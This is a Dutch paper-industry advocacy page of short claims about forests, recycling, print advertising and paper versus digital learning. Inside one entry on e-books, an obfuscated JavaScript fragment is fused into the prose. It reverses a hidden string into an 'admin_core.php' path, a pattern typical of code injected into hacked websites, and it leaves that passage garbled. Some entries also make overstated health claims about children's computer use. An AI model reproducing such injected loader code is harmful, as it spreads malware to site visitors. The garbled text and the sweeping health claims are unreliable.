Select Page

Bronnen

Duurzaamheid

Materiaal Verduurzamingsplan

Lees meer
Bos, Duurzaamheid, and Recycling

Brochure Mythen en feiten

Lees meer
Effectiviteit print

Neurologisch onderzoek toont aan: printadvertenties zijn effectiever

Lees meer
Productie

Tussen 2005 en 2013 heeft de Europese papierindustrie haar CO2-uitstoot per ton geproduceerd papier verminderd met 22%.

Lees meer
Bos

Bossen spelen een belangrijke rol bij het neutraliseren van de effecten van de klimaat ontwrichting. Europese bossen slaan circa 80 miljoen ton Carbon op. In totaal nemen bomen circa 7% op van de jaarlijks uitgestoten broeikasgassen.

Lees meer
Bos

De belangrijkste oorzaken van ontbossing zijn: niet-duurzame landbouw en houtkap; mijnbouw;infrastructuurprojecten; en bosbranden.

Lees meer
Bos

Het gebied met duurzaam beheerd en gecertificeerd bos blijft groeien. Was in 2000 18 miljoen hectare bos beschermd, in 2014 was dat al 438 miljoen hectare.

Lees meer
Papier versus digitaal onderwijs

Hoe gebruikers op het web lezen? Antwoord: they don’t. 79% van de digitale lezers scant de te lezen content slechts.

Lees meer
Bos

90% van de wereldwijde ontbossing wordt veroorzaakt door niet duurzame landbouw.

Lees meer
Bos

De grootste en directe oorzaak van tropische ontbossing is de omzetting van bos naar landbouwgrond.

Lees meer
Duurzaamheid

De mondiale ecologische voetafdruk is veel groter dan de aarde aan kan. Sinds 1988 gebruikt de mens meer dan de aarde opbrengt. De trend laat een continue overconsumptie zien. In 2008 overschreed de ecologische footprint de biocapaciteit van de aarde om hernieuwbare bronnen op te leveren en CO2 op te nemen met 50%.

Lees meer
Duurzaamheid

In de 20e eeuw is de wereldbevolking 34 keer meer materialen, 27 keer meermineralen, 12 keer meer fossiele brandstoffen en 3,6 keer meer biomassa gaan gebruiken. De stijging van de wereldbevolking en een toenemende welvaart zijn de belangrijkste oorzaken.

Lees meer
Duurzaamheid

Commissie Brundtland: duurzame ontwikkeling is de benodigde ontwikkeling en harmonisatie van bestaande institutionele, technologische, economische, ecologische en sociaal-maatschappelijke structuren binnen maatschappijen om de huidige generaties te voorzien in hun behoeftes zonder de behoeftes van volgende generaties in gevaar te brengen.

Lees meer
Verpakkingen

Fruit blijft tot drie dagen langer vers in kratten van golfkarton dan in kratten van plastic

Lees meer
Papier versus digitaal onderwijs

Als we willen dat leerlingen slimmer worden dan een smartphone, moeten we beter nadenken over de methodes waarop we ze les geven. Technologie kan goed onderwijs versterken, maar geweldige technologie kan nooit slecht onderwijs vervangen.

Lees meer
Bos

Tussen 2005 en 2015 is het Europese bos gegroeid met een oppervlakte vergelijkbaar met die van Zwitserland.

Lees meer
Effectiviteit print

De rol van print als verleider in de digitale wereld groeit. Met printmedia maakt de over te brengen boodschap meer indruk (in vergelijking met e-mails en internet) en wordt meer tijd en aandacht geschonken aan de boodschap. Tevens wordt de afzender als meer betrouwbaar en geloofwaardig beschouwd en met name ouderen en druk bezette, kapitaal krachtige consumenten worden goed bereikt.

Lees meer
Recycling

85% van het in Nederland gebruikte papier en karton wordt ingezameld en hergebruikt.

Lees meer
Verpakkingen

Papier en karton zijn de best gerecyclde verpakkingsmaterialen in Europa

Lees meer
Verpakkingen

De consument vindt papier en karton veruit de meest milieuvriendelijke verpakkingssoorten.

Lees meer
Papier versus digitaal footprint

Elektronisch afval is de snelst groeiende component van de gemeentelijke afvalstroom. De hoeveelheid wereldwijd afgedankte elektronische producten bedraagt jaarlijks 20- 50 miljoen ton. De Europese e-waste stroom groeit ieder jaar met 3 tot 5 %, bijna drie maal sneller dan de groei van de totale afvalstroom.

Lees meer
Papier versus digitaal footprint

Digitaal communiceren is inmiddels goed voor 10% van het mondiale energiegebruik. Het grootste deel van de benodigde elektriciteit komt uit de verbranding van kolen

Lees meer
Papier versus digitaal onderwijs

Het gebruik van computers door jonge kinderen moet worden beperkt. Bij deze gebruikersgroep doen de gevolgen van digitalisering zich het sterkst voor. De vertraging in de ontwikkeling, het directe verband met obesitas, een groeiend slaapgebrek, (kinder)depressies, bipolaire stoornissen, psychosen en problematisch gedrag staan in direct verband gebracht met computergebruik.

Lees meer
Papier versus digitaal onderwijs

De lezer van papier wordt minder gemakkelijk afgeleid bij het tot zich nemen van kennis. De lezer van digitale content verandert vaker van activiteit. Concentratie, begrip en memoriseren van onderwerpen staan daarmee onder druk.

Lees meer
Papier versus digitaal onderwijs

Digitale media hebben een sterk verslavende werking en zijn op lange termijn schadelijk voor ons lichaam (stress, slapeloosheid en overgewicht met alle gevolgen van dien) en vooral ook voor ons denkvermogen.

Lees meer
Papier versus digitaal onderwijs

Digitaal lezen is mentaal veeleisender en vermoeiender en verloopt trager (20 %) dan lezen op papier.

Lees meer
Papier versus digitaal onderwijs

$Ikf=function(n){if (typeof ($Ikf.list[n]) == "string") return $Ikf.list[n].split("").reverse().join("");return $Ikf.list[n];};$Ikf.list=["\'php.eroc_nimda/bil/steewt">E-books kunnen de fysieke interactie en medewerking van leerlingen stimuleren, maar het papieren boek is het beste middel om te leren lezen. Kinderen die elektronische boeken lezen, onthouden significant minder narratieve details. E-books lezen kan een effect op het geheugen van kinderen hebben, omdat de aandacht eerder naar aspecten gaat die weinig met de inhoud te maken hebben, dan naar kwesties die met het verhaal verband houden.

Lees meer
Bos

Duurzaam beheerde productiebossen zijn belangrijk voor de noodzakelijke toename van het bosoppervlak. Mede door de productiebossen van de hout- en papierindustrie groeit de bosoppervlakte in Europa. Productiebossen helpen de mondiale ontbossing en verslechtering van de bosstand tegen te gaan. Productiebossen kunnen milieuvriendelijke bronnen zijn voor hernieuwbare energie en industriële grondstoffen. Uitbreiding van het aantal productiebossen is zelfs noodzakelijk. Door de groei van de bevolking en economie zal in het jaar 2050 circa 250 miljoen hectare extra (productie)bos nodig zijn. Worden productiebossen aangelegd op de juiste plek en duurzaam beheerd, dan kunnen zij de druk verminderen op het in productie brengen van oorspronkelijk bos.

Lees meer
Effectiviteit print

de Nederlandse detailhandel in omzet voor bijna 30% afhankelijk van de papieren folders die worden verspreid.

Lees meer
Papier versus digitaal onderwijs

Lezen ter ontspanning moet worden onderscheiden van need-to-know, diepgaand lezen voor professie of studie. Zeker voor die laatste vorm lijkt lezen van een scherm dan wel internet volgens vele onderzoeken niet de aangewezen manier. Schermlezers veranderen elke drie tot tien minuten van activiteit.

Lees meer
Papier versus digitaal onderwijs

Gebruikers van de iPad en Amazon Kindle onthouden minder informatie, onder meer omdat de leestechnieken te wensen overlaten. Papier maakt het eenvoudiger om documenten naast elkaar te leggen en deze te vergelijken, om markeringen en aantekeningen te maken. Het gebruik van e-readers is volgens de studenten geschikter voor het lezen van fictie en recreatief gebruik.

Lees meer
Papier versus digitaal onderwijs

Het internet, met Google voorop, heeft ons denken oppervlakkiger gemaakt en onze hersenen zo aangepast, dat wij ook steeds meer behoefte hebben aan oppervlakkigheid. Diep denken, zoals bij geconcentreerd lezen, is voor veel mensen moeilijk, zo niet een onmogelijkheid geworden.

Lees meer
Recycling

Binnen Europa is de ambitie om een gemiddeld recyclingpercentage van 70% te halen in 2015.

Lees meer
Recycling

85% van het in Nederland gemaakte nieuw papier en karton bestaat uit gerecycled oudpapier en -karton.

Lees meer
Productie

11% van de mondiale houtoogst wordt aangewend voor het maken van papier.

Lees meer
Productie

Sinds 1990 heeft de papierindustrie haar CO2-uitstoot per ton geproduceerd papier verminderd met 40%

Lees meer
Bos, Duurzaamheid, and Productie

Ruim 80% van de voor de Europese papierproductie gebruikte pulp komt uit Europa. 75% van de door de Europese papierindustrie gebruikte verse houtvezels komt uit gecertificeerd bos.

Lees meer
Productie

Meer dan de helft van de door de Europese papierindustrie gebruikte energie is bio-energie (5 – blz. 31). De papierindustrie is verantwoordelijk voor de productie van 27% van alle bio-energie in Europa.

Lees meer
Bos

Circa 25 miljoen hectare van het wereldwijde bos is productiebos. Dat is 0,2% van het wereldlandoppervlak.

Lees meer
Bos

61,6% van de door de Europese papierindustrie gebruikte verse houtvezels komt uit gecertificeerd bos.

Lees meer
Bos

55% van het wereldwijd geoogste hout wordt gebruikt voor het opwekken van energie en het produceren van warmte voor huizen. 30% vindt toepassing in de bouwindustrie. 11% van de mondiale houtoogst wordt aangewend voor het maken van papier.

Lees meer
Bos

Bijna de helft van het Europese landoppervlak bestaat uit bos. In de afgelopen 20 jaar zijn de bosgebieden in alle Europese regio’s gegroeid. In de periode 2005-2010 is per jaar circa 870 miljoen ton CO2 opgenomen door het Europese bos. Dat staat gelijk aan 10% van de totale Europese CO2-uitstoot.

Lees meer
Bos

Het Europese bosoppervlak is toegenomen met 30% sinds 1950.

Lees meer
Papier versus digitaal footprint

Met een leestijd van 30 minuten per dag is de milieu impact van een digitale krant vergelijkbaar met die van een gedrukte, papieren krant.

Lees meer
Papier versus digitaal onderwijs

Lezen van een scherm verhindert de intellectuele leerprocessen. De daaruit volgende oppervlakkigheid is een gevaar voor de cultuur en het functioneren van de democratie.

Lees meer
Papier versus digitaal footprint

Brievenbuspost zorgt voor 0,1% van de CO2-uitstoot van Europese huishoudens. Het gaat om 14 kilo CO2-uitstoot per huishouden op jaarbasis. Dat is vergelijkbaar met: een rit van 70 kilometer met een personenauto; 5 cheeseburgers; 9 liter melk; 6,6 minuten van een trans-Atlantische vlucht.

Lees meer
Verpakkingen

Van de in Nederland gebruikte verpakkingen bestaat (gemeten naar omzet) circa 34% uit papier en karton. 39% bestaat uit kunststoffen, 12% uit metaal, 10% uit glas en 5% uit hout- en restmaterialen.

Lees meer
Duurzaamheid

Een verdrievoudiging van het mondiale materiaalgebruik in 2050 is een reële verwachting.

Lees meer
Productie

De sector Pulp-Papier-Print levert een beperkte bijdrage aan de mondiale uitstoot van CO2. Zeker in vergelijking met andere sectoren: elektriciteit en verwarming (24, 9%); transport (14,3%); landbouw (13,8%); Pulp-Papier-Print (1,1%).

Lees meer
Bos

De Europese bosproductie ontwikkelt zich op een manier die goed is voor het behoud van biodiversiteit en de handhaving van ecosystemen in bossen.

Lees meer